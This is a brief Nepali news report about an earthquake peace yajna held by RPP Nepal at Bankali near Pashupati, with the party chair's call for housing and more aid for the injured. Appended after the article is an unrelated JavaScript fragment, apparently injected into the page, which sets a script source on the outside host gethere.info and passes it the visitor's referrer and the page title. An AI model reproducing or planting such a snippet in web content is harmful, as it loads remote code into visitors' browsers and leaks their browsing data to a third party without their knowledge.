महाभूकम्पमा परि मृत्यु भएकाहरुको मोक्षको कामना गर्दे पशुपतिस्थित वनकालीमा महाभूकम्प शान्ति यज्ञको आयोजना गरिएको छ। राप्रपा नेपालले आयोजना गरेको यज्ञमा एक सय व्राह्मण, ५१ लामा र ११ किराँत धर्म गुरुहरुवाट शान्ति यज्ञ गरिएको थियो। यज्ञको उद्घाटन गर्दै राप्रपा नेपालका अध्यक्ष कमला थापाले भूकम्प प्रभावित क्षेत्रहरुमा दिगो आवासको व्यवास्था गर्नुका साथै घाइतेलाई प्रदान गरिने रकममा वृद्धि गरिनुपर्ने बताउनुभयो। यज्ञमा सयौ भक्तजनहरुको सहभागीता रहेको थियो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;